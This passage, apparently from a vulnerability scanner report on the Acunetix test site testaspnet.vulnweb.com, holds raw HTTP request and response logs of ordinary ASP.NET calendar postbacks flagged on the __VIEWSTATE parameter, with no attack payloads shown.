style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8489&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAlLSxMNsIZGRkmwxBsk8x1a%2FkkLdBPjguHzrSU%2B4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKClMCwBALTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdg9g9%2FsugOp%2FTTDyPMqpq%2FdI1LoQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:13 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAlLSxMNsIZGRkmwxBsk8x1a/kkLdBPjguHzrSU+4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKClMCwBALTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdg9g9/sugOp/TTDyPMqpq/dI1LoQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:White" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8493&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAO17WM9sIZGRkMzlkg5gNo4ym%2BKlOSYbrbF7nqoo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL0lo7CDwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlweuvAXITrhaVPm%2BFPklRNUJxRgrLg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:35 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAO17WM9sIZGRkMzlkg5gNo4ym+KlOSYbrbF7nqoo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL0lo7CDwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlweuvAXITrhaVPm+FPklRNUJxRgrLg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:White" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 